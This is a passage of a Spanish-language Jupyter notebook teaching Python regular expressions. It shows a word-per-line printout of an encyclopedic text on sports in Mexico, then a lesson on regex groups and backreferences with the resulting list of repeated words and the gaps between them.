nSerie\nLatinoamericana\ny\nla\nLiga\nTabasqueña\nde\nBéisbol\nLTB\nlas\ncuales\nson\nde\nmenor\nnivel\ndebido\na\nque\nla\nmayoría\nde\nsus\njugadores\nson\nveteranos\no\njóvenes\nen\ndesarrollo\nque\nen\nel\nfuturo\nllegarán\na\nla\nLMB\ny\nla\nLMP\nEn\nel\nClásico\nMundial\nde\nBéisbol\n2006\nel\ncombinado\nmexicano\ndio\nla\ngrata\nsorpresa\nal\navanzar\nel\nprimero\nen\nsu\ngrupo\npara\nser\neliminado\nen\nla\nsiguiente\nronda\nal\nperder\nante\nJapón\ny\nCorea\ndel\nSur\nno\nsin\nantes\neliminar\na\nlos\nEstados\nUnidos\nel\nanfitrión\ndel\nevento\nEn\nla\nedición\nde\n2009\nMéxico\ntuvo\nla\nsede\ndel\nForo\nSol\nen\nla\nronda\npreliminar\nEn\nla\nedición\nde\n2017\nMéxico\nvolvió\na\ntener\nla\noportunidad\nde\nser\nsede\nen\nla\nronda\npreliminar\nsiendo\nel\nEstadio\nPanamericano\nde\nZapopan\nel\nescenario\nque\nacogió\nlos\njuegos\npertenecientes\nal\nGrupo\nD\ncompuesto\npor\nlos\ncombinados\nnacionales\nde\nMéxico\nPuerto\nRico\nVenezuela\ne\nItalia\nEn\nla\nCopa\nMundial\nde\nBéisbol\nMéxico\ncuenta\ncon\n4\nmedallas\nde\nplata\ny\nuna\nde\nbronce\nfue\nsede\ndel\nevento\nen\nla\nedición\nde\n1951\nNota\nEn\nla\npronunciación\ny\nortografía\ndel\nespañol\nmexicano\nse\nusa\nla\nvariante\nbasquetbol\nEl\nsegundo\ndeporte\nde\nconjunto\nmás\npracticado\nen\nel\npaís\nes\nel\nbásquetbol\nescrito\ny\npronunciado\nbasquetbol\nen\nel\npropio\npaís\nsin\nembargo\nes\nel\ncuarto\nmás\npopular\ndespués\ndel\nfútbol\nel\nboxeo\ny\nel\nbéisbol\nActualmente\nla\nliga\nmás\nimportante\nen\nel\npaís\nen\neste\ndeporte\nes\nla\nLiga\nNacional\nde\nBaloncesto\nProfesional\nLNBP\ny\nen\nla\nrama\nfemenil\nla\nLiga\nMexicana\nde\nBaloncesto\nProfesional\nFemenil\nLMBPF\nademás\nde\nalgunas\nligas\nregionales\ncomo\nel\nCircuito\nde\nBaloncesto\nde\nla\nCosta\ndel\nPacífico\nCIBACOPA\ny\nel\nCircuito\nde\nBaloncesto\ndel\nPacífico\nCIBAPAC\nque\ncomo\nsus\nnombres\nlo\nindican\nlas\ncomponen\nequipos\nde\nesa\nzona\nasí\ncomo\nla\nLiga\nde\nBaloncesto\ndel\nSureste\nLBS\nque\nincluye\na\nlos\nequipos\nde\nesa\nparte\ndel\npaís\nel\nCircuito\nde\nBásquetbol\ndel\nNoreste\nCIBANE\nque\ncomo\nsu\nnombre\nlo\nindica\nlo\ncomponen\nequipos\nde\nesa\nregión\nla\nLiga\nPremier\nde\nBaloncesto\nLPB\ny\nla\nLiga\nde\nBásquetbol\nEstatal\nde\nChihuahua\nLBE\nambas\ncon\nbase\nen\nel\nestado\nde\nChihuahua\nEstas\nligas\nregionales\ntienen\nparticipación\nen\nlos\nmeses\nde\ndescanso\nde\nla\nLNBP\nque\ndicho\nsea\nde\npaso\nvolverá\na\ntener\ncompetencia\nante\nel\ninminente\nregreso\ndel\nCircuito\nMexicano\nde\nBásquetbol\nCIMEBA\nel\ncual\nfue\ndurante\nmucho\ntiempo\nla\nprincipal\nliga\nde\nbásquetbol\nprofesional\nen\nMéxico\nEl\nmayor\néxito\ndel\nbaloncesto\nmexicano\nes\nla\nmedalla\nde\nbronce\nen\nlos\nJuegos\nOlímpicos\nde\nBerlín\n1936\nEn\nel\n2013\nse\nformó\nla\nLiga\nMexicana\nde\nVoleibol\nLMV\ncon\nel\naval\nde\nla\nFederación\nMexicana\nde\nVoleibol\nFMVB\nmisma\nque\nentró\nen\nvigor\nen\n2014\nen\nambas\nramas\ndando\nlugar\na\nla\nLiga\nMexicana\nde\nVoleibol\nVaronil\nLMVV\ny\na\nla\nLiga\nMexicana\nde\nVoleibol\nFemenil\nLMVF\nEsto\ncon\nel\nobjetivo\nde\nque\nambos\ncircuitos\nfueran\nla\nbase\npara\nintegrar\na\nlas\nselecciones\nnacionales\nde\ncara\nal\nciclo\nolímpico\nde\nRío\nde\nJaneiro\n2016\nya\nque\nse\nformaron\nequipos\nde\nvarias\npartes\ndel\npaís\ncon\nla\nfinalidad\nde\nobservarlos\nNo\nobstante\neste\nno\nfue\nel\nprimer\nintento\nde\nuna\nliga\nprofesional\nde\nvoleibol\nen\nMéxico\nya\nque\nanteriormente\nla\nLiga\nPremier\nde\nVoleibol\nLPV\ntambién\nse\ndesarrolló\nen\nambas\nramas\nLos\nmayores\néxitos\ndel\nvoleibol\nmexicano\nfueron\nlas\nmedallas\nde\noro\ny\nplata\nen\nlas\nramas\nfemenil\ny\nvaronil\nrespectivamente\nde\nlos\nJuegos\nPanamericanos\nde\n1955\nNota\nEn\nla\npronunciación\ny\nortografía\ndel\nespañol\nmexicano\nse\nusa\nla\nvariante\nfutbol\nEn\nel\n2016\nse\nformó\nla\nLiga\nde\nFútbol\nAmericano\nProfesional\nLFA\ncon\nel\nrespaldo\nde\nla\nFederación\nMexicana\nde\nFútbol\nAmericano\nFMFA\nmisma\nque\nentró\nen\nvigor\nen\nfebrero\nde\ndicho\naño\ncon\n4\nequipos\n3\nde\nla\nCiudad\nde\nMéxico\ny\n1\ndel\nEstado\nde\nMéxico\nteniendo\ncomo\nsede\nel\nEstadio\nJesús\nMartínez\nPalillo\nde\nla\nCiudad\nDeportiva\nde\nLa\nMagdalena\nMixiuhca\nEn\nla\nactualidad\nestá\nconformada\npor\nocho\nequipos\ntres\nde\nellos\nde\nla\nCiudad\nde\nMéxico\ndos\ndel\nEstado\nde\nMéxico\nuno\nde\nCoahuila\nuno\nde\nNuevo\nLeón\ny\nuno\nmás\nde\nPuebla\nAdemás\nen\n2018\nse\nfundó\nla\nLiga\nFútbol\nAmericano\nde\nMéxico\nFAM\nque\nactualmente\nestá\nconformada\npor\ncinco\nequipos\nde\nlas\nentidades\nde\nChihuahua\nCiudad\nde\nMéxico\nEstado\nde\nMéxico\nJalisco\ny\nQuerétaro\nDe\nforma\nparalela\nexiste\nla\nOrganización\nNacional\nEstudiantil\nde\nFútbol\nAmericano\nque\ndesde\n1930\ny\ncon\ndistintas\ndenominaciones\nha\norganizado\ncampeonatos\nnacionales\nde\neste\ndeporte\nLa\nLiga\nMexicana\nElite\nde\nHockey\nLMEH\nfue\ninaugurada\nel\n2\nde\noctubre\nde\n2010\ncon\nel\nobjetivo\nde\nestablecer\nel\nhockey\nsobre\nhielo\nde\nMéxico\na\nun\nalto\nnivel\ninternacional\nEsto\nse\nlogró\ncon\nla\nparticipación\nconjunta\nde\ninversión\nprivada\ny\nlos\nequipos\nprofesionales\nde\nhockey\nya\nexistentes\nen\nel\npaís\nEn\nla\nactualidad\nestá\nconformada\npor\ncuatro\nequipos\ntodos\nde\nellos\nde\nla\nCiudad\nde\nMéxico\nLa\npelota\nvasca\nen\nMéxico\nse\npractica\ndesde\n1895\naproximadamente\ny\nestá\nrepresentada\npor\nla\nFederación\nMexicana\nde\nFrontón\nA.C\nLa\nconforman\nactualmente\n17\nespecialidades\nde\nparticipación\ninternacional\ny\nse\npractican\nen\nel\npaís\n26\nen\ntotal\nBasta\ndecir\nque\nen\nMéxico\nsurgió\nen\nel\naño\nde\n1916\nuna\nnueva\nespecialidad\ndentro\nde\nla\npelota\nel\nfrontenis\nA\npartir\nde\nsu\niniciación\nlas\nrepresentaciones\nmexicanas\nhan\nganado\nen\ntodas\nlas\nediciones\nde\nlos\n12\nCampeonatos\nMundiales\nque\nse\nhan\ncelebrado\nhasta\nla\nfecha\nexceptuando\nLa\nHabana\n1990\nEn\nla\nactualidad\nse\ntiene\nun\ndesarrollo\ncuya\nestructura\ncuenta\nen\nsu\nbase\ncon\n2\nCategorías\nInfantiles\ny\n3\nJuveniles\nconformadas\npor\ndeportistas\nentre\nlos\n8\ny\n21\naños\nSe\nrealiza\nun\nCampeonato\nNacional\nde\ncada\nEspecialidad\ny\nCategoría\nque\nestá\ndividido\nen\n3\nFases\nlogrando\nasí\nun\ntotal\nde\n120\nEventos\nAnuales\nque\ntambién\ncontempla\nel\ndesarrollo\nde\nla\nPrimera\nFuerza\nen\nalgunas\nSegunda\ny\nTercera\nademás\nde\nlos\nVeteranos\nse\ntiene\nun\nSistema\nde\nClasificación\npor\npuntuación\nel\ncual\nnos\napoya\nfirmemente\npara\nconformar\nlas\nSelecciones\ny\nPreselecciones\nNacionales\nLa\nFederación\nMexicana\nde\nFrontón\nA.C\ncontempla\ndos\nmodalidades\nDobles\ny\nSingles\npara\nlas\nespecialidades\nque\nson\nCesta\nPunta\nVaronil\nFrontón\nCubano\nVaronil\nFrontón\na\nMano\ncon\nPelota\nDura\nen\nTres\nParedes\ny\nen\nTrinquete\nVaronil\nPala\nCorta\nVaronil\nPaleta\ncon\nPelota\nde\nCuero\nen\n3\nParedes\ny\nen\nTrinquete\nVaronil\nPaleta\ncon\nPelota\nde\nGoma\nen\n3\nParedes\nVaronil\ny\nen\nTrinquete\nFemenil\ny\nVaronil\nasí\ncomo\nFrontenis\nFemenil\ny\nVaronil\nLa\nCiudad\nde\nMéxico\ntiene\nla\npoblación\nde\nmás\ncanchas\npara\nla\npráctica\nde\nla\npelota\nvasca\nen\nel\nmundo\nEs\nla\ndisciplina\ndeportiva\nque\nmás\nmedallas\ny\ntítulos\nen\ncampeonatos\nmundiales\nha\notorgado\nal\ndeporte\nmexicano\ncon\nun\ntotal\nde\n123\npreseas\n50\nde\noro\n41\nde\nplata\ny\n32\nde\nbronce\nla\nmitad\nde\nlos\nmetales\ndorados\nprovienen\nde\nla\ndisciplina\ncreada\nen\nMéxico\nel\nfrontenis\nMéxico\nes\nuna\nde\nlas\ntres\npotencias\nmundiales\nde\neste\ndeporte\njunto\na\nEspaña\ny\nFrancia\ncon\nquienes\nsiempre\ndisputa\nel\nmedallero\nde\nlos\ncampeonatos\nmundiales\nde\nla\nespecialidad\nFue\ndisciplina\nde\nexhibición\nen\nlos\nJuegos\nOlímpicos\nde\nMéxico\n1968\ny\nen\nlos\nJuegos\nOlímpicos\nde\nBarcelona\n1992\nEn\naquellas\nocasiones\nMéxico\nobtuvo\n2\nmedallas\nde\noro\ny\n3\nde\nbronce\nen\n1968\nasí\ncomo\n3\nde\noro\n2\nde\nplata\ny\n2\nde\nbronce\nen\n1992\nEl\nboxeo\ny\nla\nlucha\nlibre\ngozan\nigualmente\nde\nbuena\nreputación\ny\npopularidad\nEn\nla\nprimera\ndisciplina\nboxeadores\nmexicanos\nhan\nsido\ncampeones\nmundiales\ny\nolímpicos\ntales\ncomo\nSalvador\nSánchez\nJulio\nCésar\nChávez\nJosé\nLuis\nRamírez\nCarlos\nZárate\nRubén\nOlivares\nÉrik\nel\nTerrible\nMorales\nentre\notros\nHoy\nen\ndía\nen\nel\nbox\nfiguran\nnuevas\npromesas\nmundiales\ncomo\nSaúl\nEl\nCanelo\nÁlvarez\nJulio\nCésar\nChávez\nJr\nLa\nlucha\nlibre\nhay\nque\ndecir\nque\nes\nun\ndeporte\ncon\nuna\ngran\nafición\nllena\nde\ngrandes\nmitos\ncomo\nEl\nSanto\nenmascarado\nde\nplata\no\nsu\nrival\nBlue\nDemon\ny\nalgunos\nluchadores\nque\nestán\nen\nel\ncentro\nde\nsu\ncarrera\ncomo\nSin\nCara\ny\nAlberto\ndel\nRío\naunque\núltimamente\nlas\nprincipales\nempresas\nde\nlucha\nlibre\nhan\ndejado\ndel\nlado\nel\naspecto\ndeportivo\npara\nconvertirla\nen\nun\nespectáculo\nno\npor\nello\nmenos\natractivo\npara\nel\npúblico\nLa\nfiesta\ntaurina\nes\ntambién\nmuy\nseguida\nsobre\ntodo\nen\nel\ncentro\ndel\npaís\nsiendo\nla\nplaza\nmás\nimportante\nLa\nMonumental\nPlaza\nde\nToros\nde\nMéxico\nmejor\nconocida\ncomo\nla\nPlaza\nMéxico\nOtros\ndeportes\nque\nse\npractican\nen\nMéxico\nlas\ncarreras\nde\ncaballos\nque\ntienen\ncomo\nescenario\nprincipal\nal\nHipódromo\nde\nlas\nAméricas\nde\nla\nCiudad\nde\nMéxico\nlas\ncarreras\nde\ngalgos\nen\nel\nGalgódromo\nde\nAgua\nCaliente\nde\nTijuana\ny\nen\nel\nde\nCiudad\nJuárez\nMéxico\ntuvo\nsu\nprimera\nparticipación\nen\nel\nesquí\nOlímpico\nen\nlos\nJuegos\nOlímpicos\nde\nInvierno\nde\nSarajevo\n1984\nhaciendo\npresencia\ncon\nel\nmexicano\nde\norigen\nalemán\nHubertus\nVon\nHohenlohe\nen\nla\ncategoría\nde\nesquí\nalpino\nLos\npocos\nmexicanos\nque\nhan\ncompetido\nen\nlos\nJuegos\nOlímpicos\nde\ninvierno\nnunca\nhan\nobtenido\nalguna\npresea\nEl\nesquí\nen\nMéxico\nes\nconsiderado\ncomo\nun\ndeporte\nde\nélite\nmuy\npocos\nmexicanos\npractican\nlos\ndeportes\ninvernales\npor\nla\nfalta\nde\ndifusión\ne\ninstalaciones\ndentro\ndel\nterritorio\nde\nese\npaís\nEl\nhockey\nsobre\nhielo\ny\nel\npatinaje\nsobre\nhielo\nha\nempezado\na\nser\ndifundido\nen\nel\nterritorio\nnacional\nse\nhan\nestado\nformando\nlas\nprimeras\nescuelas\ne\ninstalaciones\nal\nmomento\nsolo\nhay\ndemostraciones\ntemporales\ncon\ndeportistas\nmexicanos\nbastante\njóvenes\nque\nincursionan\nen\nestos\ndeportes\nMéxico\nha\nsido\nsede\ndel\nCampeonato\nde\nMundo\nde\nPádel\nen\n2002\nen\nla\nCiudad\nde\nMéxico\ny\nen\n2010\nen\nCancún\nMéxico\ntambién\nfue\nsede\ndel\nVIII\nCampeonato\nMundial\nde\nPolo\n2008\nEntre\nlos\ndeportes\nque\nse\npractican\nde\nmanera\nprofesional\nen\nMéxico\nson\nel\nautomovilismo\ncuyo\nescenario\nprincipal\nes\nel\nAutódromo\nHermanos\nRodríguez\nAsimismo\nen\nlos\núltimos\naños\nse\nhan\nrealizado\nfechas\noficiales\ndentro\ndel\ncalendario\noficial\ndel\nWorld\nRally\nChampionship\nque\nes\nla\ncompetencia\nautomovilística\nde\nla\ncategoría\nde\nRallies\nmás\nimportante\ndel\nmundo\ny\ncuenta\ncon\nla\naprobación\nde\nla\nFIA\nFederación\nInternacional\ndel\nAutomóvil\npor\nsus\nsiglas\nen\nfrancés\ny\nse\nlleva\na\ncabo\nen\nlas\nciudades\nde\nLeón\nde\nlos\nAldamas\nSilao\nde\nla\nVictoria\ny\nGuanajuato\nen\nel\nestado\nde\nGuanajuato\nDicha\ncompetición\ncada\naño\nha\nlogrado\natraer\na\nmás\nfanáticos\nde\nla\ncategoría\ndel\npaís\ny\ndel\nmundo\nademás\nde\ngenerar\nimportantes\nderramas\neconómicas\npara\nel\nestado\nDesde\nel\naño\n2015\nel\nAutódromo\nHermanos\nRodríguez\nacoge\nuna\ncarrera\nde\nFórmula\n1\nnuevamente\ndespués\nde\n23\naños\nde\nausencia\nPese\na\nno\ncontar\ncon\nun\ncomité\nolímpico\nconstituido\nMéxico\nparticipó\npor\nprimera\nvez\nen\nlos\nJuegos\nen\n1900\nen\nParís\nTres\nhermanos\nManuel\nPablo\ny\nEustaquio\nEscandón\nBarrón\nparticiparon\nen\nel\nTorneo\nde\nPolo\nobteniendo\nla\ntercera\nposición\nen\nEl\nGran\nPremio\nde\nla\nExposición\nEsta\nvictoria\nse\nconsidera\noficialmente\nla\nprimera\nmedalla\nolímpica\nde\nMéxico\nMéxico\nfue\nel\nprimer\npaís\nde\nAmérica\nLatina\nen\nser\nsede\nde\nlos\nJuegos\nOlímpicos\nde\nverano\nen\n1968\nLa\nceremonia\nde\ninauguración\nse\nrealizó\nel\n12\nde\noctubre\nen\nconmemoración\nde\nla\nllegada\nde\nCristóbal\nColón\nal\nllamado\nNuevo\nMundo\nEntre\nlas\nnovedades\nque\npresentó\nel\nComité\nOrganizador\nse\nencuentra\nel\nhecho\nde\nque\nla\nllamada\nllama\nolímpica\nfue\nencendida\npor\nprimera\nocasión\npor\nuna\nmujer\nEnriqueta\nBasilio\nla\ngacela\nbajacaliforniana\natleta\nde\npista\nEn\njuegos\nolímpicos\nsu\nmejor\nparticipación\nfue\nprecisamente\nen\nesta\nocasión\ncuando\nconsiguió\nnueve\nmedallas\ntres\nde\ncada\nmetal\nQuizá\nla\nmás\nrecordada\nde\nellas\nsean\nlas\nde\nFelipe\nel\nTibio\nMuñoz\noro\nen\nnatación\ny\nla\ndel\nSargento\nJosé\nPedraza\nque\nganó\nla\nplata\nen\ncaminata\nen\nuna\ndisputada\ncarrera\ncontra\nlos\nsoviéticos\nVladimir\nGolubnichy\ny\nNikolav\nSmaga\nOtras\nfiguras\nmemorables\ndel\nolimpismo\nmexicano\nson\nGuillermo\nPérez\nal\nobtener\nel\nprimer\nlugar\nen\ntaekwondo\nrompió\ncon\nla\nracha\nde\n24\naños\nsin\npresea\náurea\nen\nhombres\ndesde\nLos\nÁngeles\n1984\nEn\nel\námbito\nde\nparticipaciones\nfemeninas\nse\nencuentra\nSoraya\nJiménez\nlevantadora\nde\npesas\nla\nprimera\nmujer\nmexicana\nen\nconseguir\nmedalla\nde\noro\nen\nSídney\n2000\ny\nBelem\nGuerrero\nque\nconsiguió\nmedalla\nolímpica\nen\nciclismo\nde\npista\nen\nAtenas\n2004\nOtra\nmujer\nque\ntiene\ndiversas\nparticipaciones\ninternacionales\nes\nAna\nGabriela\nGuevara\nquien\nobtuvo\nen\n2002\nla\nIAAF\nGolden\nLeague\nen\natletismo\ny\nfue\nganadora\nde\n2\nmedallas\nde\noro\nen\nla\nCopa\ndel\nMundo\nMadrid\n2002\ny\nla\nde\noro\nen\nel\nCampeonato\nMundial\nde\nAtletismo\nde\n2003\nen\nParís\nPor\notra\nparte\nMéxico\nha\nsido\nsede\nde\nla\nCopa\nMundial\nde\nFútbol\nde\n1970\ny\ntambién\nde\nla\nCopa\nMundial\nde\nFútbol\nde\n1986\nEsta\núltima\nhabía\nsido\nconcedida\na\nColombia\nque\nno\npudo\ncumplir\ncon\nel\ncompromiso\ndebido\na\nun\nlamentable\ndesastre\nnatural\nEn\nla\nprimera\nse\ncoronó\ncampeón\nel\nrepresentativo\nde\nBrasil\nque\nse\nquedó\ncon\nla\ncopa\nJules\nRimet\nEn\n1986\nel\ncampeón\nfue\nArgentina\nMéxico\ntambién\nha\nsido\nsede\nde\nlos\nJuegos\nPanamericanos\nen\n3\nocasiones\n1955\ny\n1975\nen\nCiudad\nde\nMéxico\ny\nen\n2011\nen\nGuadalajara\nde\nlos\nJuegos\nCentroamericanos\ny\ndel\nCaribe\nen\ncuatro\njustas\n1926\n1954\ny\n1990\nen\nCiudad\nde\nMéxico\ny\nen\n2014\nen\nVeracruz\ny\nde\nla\nUniversiada\nde\n1979\nen\ndonde\nha\ncumplido\ncon\nparticipaciones\nnotables\nMéxico\nfue\nel\nprimer\npaís\nen\norganizar\nunos\nJuegos\nOlímpicos\n1968\ny\nun\nCampeonato\nMundial\nde\nFútbol\n1970\nen\nun\nperíodo\nde\ndos\naños\nDespués\nlo\nlograrían\nAlemania\nJuegos\nOlímpicos\nen\n1972\ny\nMundial\n1974\nEstados\nUnidos\nMundial\n1994\ny\nJuegos\nOlímpicos\nde\n1996\ny\nBrasil\nCopa\ndel\nMundo\nde\n2014\ny\nJuegos\nOlímpicos\nde\n2016\nLas\nediciones\nolímpicas\ninvernales\ndonde\nMéxico\nha\nestado\npresente\nson\nSt\nMoritz\n1928\nSarajevo\n1984\nCalgary\n1988\nAlbertville\n1992\nLillehammer\n1994\nSalt\nLake\nCity\n2002\ny\nVancouver\n2010\nen\nlas\ndisciplinas\nde\nEsquí\nalpino\nBobsleigh\nEsquí\nde\nfondo\nPatinaje\nartístico\nsobre\nhielo\ny\nSkeleton\nMéxico\nha\nestado\npresente\nen\nlos\nJuegos\nParalímpicos\nde\nverano\nen\nlas\nediciones\nde\nHeidelberg\n1972\nToronto\n1976\nArnhem\n1980\nNueva\nYork\n1984\nSeúl\n1988\nBarcelona\n1992\nAtlanta\n1996\nSídney\n2000\nAtenas\n2004\nPekín\n2008\ny\nLondres\n2012\ny\nen\ninvierno\nen\nTurín\n2006\ny\nVancouver\n2010\nHa\nasistido\na\notras\njustas\ndeportivas\ncomo\nlos\nJuegos\nOlímpicos\nde\nla\nJuventud\nen\nsu\nedición\nde\nverano\nen\nSingapur\n2010\ny\nde\ninvierno\nen\nInnsbruck\n2012\nasí\ncomo\ntambién\nha\nacudido\na\nvarias\nediciones\nde\nlas\nOlimpíadas\nde\nAjedrez\ndoc\n" ] ], [ [ "#### Grupos", "_____no_output_____" ], [ "Para cerrar el tema, veremos los grupos, ya vimos como formarlos: con paréntesis `( )`. Pero cada paréntesis que se usa forma un grupo al cuál se le puede hacer referencia despúes.", "_____no_output_____" ] ], [ [ "# Se pueden usar los grupos dentro de la misma expresion\nexpresion = re.compile(r\"\\b(\\w+)\\b(.*?)\\b\\1\\b\")\nbusqueda = expresion.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(1),len(resultado.group(2)))", "1830 43\nMéxico 144\nfederal 74\ntiene 217\nde 124\nel 43\nMéxico 335\nen 56\nel 50\nen 114\nel 128\ny 35\nen 204\nla 100\nla 242\nde 106\nla 189\ny 48\npor 80\nen 191\nes 122\n12 50\ntérmino 809\ncomo 37\nque 206\nde 77\nde 12\ncomo 593\ngentilicio 314\nde 11\ndel 39\nde 52\nes 59\ndel 584\nvocablo 225\nClavijero 179\nque 24\nel 25\ndel 28\nde 13\nlos 80\nde 46\ny 166\nel 24\nde 22\ndel 24\nde 67\ny 49\ny 95\nde 208\nla 31\na 27\nC 57\nde 82\nla 121\ny 81\nde 49\ny 47\nEl 187\nde 40\nla 11\nde 89\nse 136\nel 66\nel 235\nfue 55\nel 133\nSe 211\nen 130\nfueron 83\na 8\nde 13\nperiodo 41\nde 79\nciudades 143\ny 38\nse 150\ny 54\nen 53\nla 101\ny 47\nde 104\nla 53\nobsidiana 7\ny 101\nde 74\ny 52\nla 15\nalgunos 113\nde 19\nobsidiana 7\ny 101\nde 144\nTeotihuacán 68\nla 72\nen 44\nde 103\npiedra 232\ncon 30\nfecha 17\nla 63\nlos 43\nlos 18\nque 154\nel 46\ndios 48\ndel 54\ndios 44\ndel 23\nla 32\nciudades 141\nla 48\nestaban 51\nla 33\npara 82\nde 178\npara 36\ny 104\nel 19\nsur 18\ny 64\nciudad 120\nde 37\nla 152\nse 19\nse 153\nla 34\nde 55\nperiodo 41\nun 151\nLa 294\nse 180\nen 282\nque 11\ndel 45\ncon 171\nsu 400\nde 104\nde 44\ndel 183\nque 8\nsu 53\ngran 16\npoder 158\nde 18\nde 23\nCortés 137\nla 25\ncomo 46\nespañoles 304\npero 104\nel 71\nde 8\ny 225\nde 52\nel 45\nse 256\nen 49\nla 27\nde 40\nLa 217\nel 310\na 9\nEl 478\ncomercio 198\nla 229\ny 229\nMonte 47\nde 125\ndel 18\nen 141\nde 46\nfe 165\nde 90\ny 177\nla 127\nde 16\nla 15\nde 47\nla 79\nen 155\nse 88\nmuchas 113\nde 31\nde 205\nEn 323\ny 45\nen 277\nde 86\ny 413\nel 100\nde 15\nde 12\nde 10\nde 49\nel 410\nde 26\nEl 117\nfue 215\nde 49\ncomo 26\ny 104\nde 101\na 9\nla 66\ndel 8\nen 221\nen 46\nse 23\nMéxico 458\ny 7\nde 179\nSanta 166\nLa 622\ny 70\nde 25\nJuárez 151\nfue 232\npor 197\nsociales 448\ny 152\nde 6\ny 35\nEn 330\nCarranza 117\nfue 232\nelecto 385\nCárdenas 53\nla 12\ny 148\nla 150\nen 109\nel 428\nde 37\npor 140\nde 11\nla 67\nla 76\nen 312\nla 124\nde 190\nla 88\nen 27\ncomo 31\nla 19\nen 141\nel 57\nde 16\nSu 256\nEZLN 276\nEn 268\nse 353\nen 234\nde 41\nde 56\nla 127\nel 60\nde 28\nMéxico 194\ndel 184\ny 141\nPoder 178\nde 51\nla 40\nde 84\nde 46\ny 445\nprovisional 135\nel 27\nde 230\nlas 36\ny 39\nde 189\nde 182\nde 282\nla 236\npara 168\nde 18\nla 16\nde 38\nde 20\ny 180\nde 11\nla 99\nAuditoria 513\ndel 229\nnacional 477\nla 15\nde 32\nde 80\nen 28\nEl 474\nFederal 113\nen 341\ntodos 139\nde 47\nde 10\nla 283\nConstitución 628\ny 280\nde 142\nLas 256\nde 84\ncomo 206\nde 30\nestados 39\nde 57\ny 139\nde 39\npoderes 424\nde 50\nlas 38\nlos 21\nse 352\nmunicipio 97\nen 106\nmunicipios 35\nes 64\nlos 336\nde 44\ncon 21\nde 38\nlos 34\na 23\ny 155\nun 106\ny 388\nla 30\ndel 439\nde 7\nen 360\nEn 395\nde 15\npolítica 591\nEn 456\nde 22\nse 169\ndel 274\nla 75\nde 70\nla 44\nde 48\nMéxico 54\npor 18\na 21\nla 23\nde 43\nla 114\ncon 33\nde 97\ny 42\ndel 110\npaís 283\nen 42\ny 137\nFuerzas 411\nlo 5\nde 63\nen 18\nde 27\nla 51\nde 17\ny 72\nel 290\nde 48\nla 45\nel 118\nla 259\nde 20\nel 11\nde 18\npesos 21\npara 29\nMéxico 422\npaís 870\n3 432\nse 96\nla 31\nLlanura 114\nde 138\nla 23\ny 11\nlas 72\nSierra 142\nEje 171\nde 82\nel 42\nm 25\nel 50\nel 27\nde 58\nde 62\nde 42\nChiapas 22\nmás 296\nes 85\nlas 177\nde 98\ny 109\nvalles 56\nde 103\nel 280\nen 174\nel 227\npaís 64\nen 96\nclimas 191\nesta 511\nlas 79\nentre 46\nlos 63\nclima 209\nde 12\nla 114\ny 65\ntipo 280\nde 53\nel 26\nde 27\nEl 284\nprecipitación 94\nes 101\nLa 107\nes 253\nde 35\nde 81\nla 52\nmm 14\nde 29\nC 94\ny 128\nríos 127\nes 174\nel 76\nrío 155\nel 238\nrío 162\nen 24\nde 10\nlagos 217\nel 20\nel 125\nMéxico 95\nMéxico 199\nel 17\nen 25\nde 134\nde 34\n4 67\nUno 740\nen 133\nde 45\ndel 128\nla 62\nde 47\nla 39\nde 19\nla 167\nel 165\nde 124\nen 82\nel 44\nde 21\nla 42\nde 17\ny 13\nen 147\nde 5\ny 172\na 63\nen 52\nla 175\nel 473\nde 53\nla 32\nde 297\nel 123\nel 18\ndel 361\nel 44\nque 161\nse 94\ny 39\nde 19\nLa 219\neconomía 201\nen 52\nlos 96\ny 35\nse 63\npor 64\nque 86\npara 92\npor 35\nen 63\nla 129\ny 44\nque 76\nde 66\n0 153\nde 9\nmillones 70\nen 58\nun 66\nde 20\ny 14\nen 215\nlas 38\nla 43\na 133\nmillones 90\nde 68\na 366\nla 73\nen 16\nel 64\nla 17\ndel 212\ny 326\npor 45\nde 60\ndel 14\nde 205\nlibre 309\ncon 19\nes 37\nen 68\nen 24\ny 149\nde 11\ndurante 95\nel 22\nde 35\nde 23\nla 67\nen 27\nMéxico 51\nla 27\nde 108\nreservas 31\nen 41\nde 29\nde 53\nturismo 338\nel 100\nde 35\nde 107\nde 21\nde 79\nde 32\nlas 26\ny 369\nen 472\nde 51\ny 180\nde 21\nde 60\nde 68\nque 15\nen 171\nde 66\nde 103\nla 94\nimagen 134\na 836\nde 15\na 260\nlas 144\ny 271\nde 9\nla 58\nmexicana 561\nel 21\nnacional 696\na 16\nde 13\nun 411\nque 27\nMéxico 102\nel 107\nde 23\nla 176\nno 9\nel 83\nen 143\nde 19\n0 29\nla 64\nde 44\nde 143\ny 134\nen 145\nde 22\nde 137\nen 160\nel 92\nla 13\nen 99\nde 40\nde 7\nenergía 118\ngeotérmica 35\nSegún 500\nde 12\nen 13\nEn 263\nel 113\nde 28\nCampeche 52\nde 50\nla 60\nde 8\nvías 665\nde 34\nMéxico 31\ncon 98\nel 141\nla 98\nde 8\nen 470\nel 195\nMéxico 161\ny 242\nel 109\nel 245\nde 16\ny 33\nel 115\nde 16\nel 183\nde 79\nla 146\ndel 71\nde 39\nde 11\nde 19\nel 64\na 60\nde 32\nde 9\nde 28\nla 40\nla 40\nla 169\ncosta 55\nde 50\nla 33\nde 81\nMéxico 17\nEl 365\nel 39\nCanal 71\na 52\nla 63\nde 29\nde 21\nEn 110\nmuchas 246\nestaciones 189\nde 66\nMéxico 139\nen 25\nLa 102\nteléfono 96\nen 159\nde 17\nde 10\nde 29\nque 243\nLas 670\nde 32\ny 105\nMéxico 224\nel 18\nEn 184\nlos 89\nel 29\nel 35\ndiarios 166\nde 85\nlos 62\nMéxico 716\nla 34\nde 15\nradio 314\nciudades 145\nen 19\nque 59\nde 46\nEl 432\nla 14\nde 15\nagua 158\nel 147\nde 30\nde 12\nLa 166\npoblación 311\nde 47\na 54\nla 67\npoblación 107\npor 382\nel 478\nla 56\náreas 264\nque 104\nse 123\nextienden 78\nde 13\nMéxico 2\ny 11\nde 38\nse 492\nde 48\nEl 140\nen 61\nla 9\nen 268\nla 17\nuna 46\nde 20\nMéxico 92\nuna 146\nde 93\nde 56\nen 165\npor 60\nla 154\npoblación 86\nde 43\nla 11\nde 93\nla 49\nde 29\nla 24\ngrupos 271\nel 21\nde 31\n1 28\nde 96\nla 258\nde 174\ninmigración 255\nen 234\npaís 447\nlos 27\nMéxico 205\nde 99\ny 238\nde 9\nextranjeros 40\nMéxico 466\nel 82\nde 80\nlos 139\ny 91\nde 11\nel 113\nde 127\ncon 25\nla 22\nen 164\nque 86\nde 15\nes 123\nque 236\nreligión 42\nde 44\nde 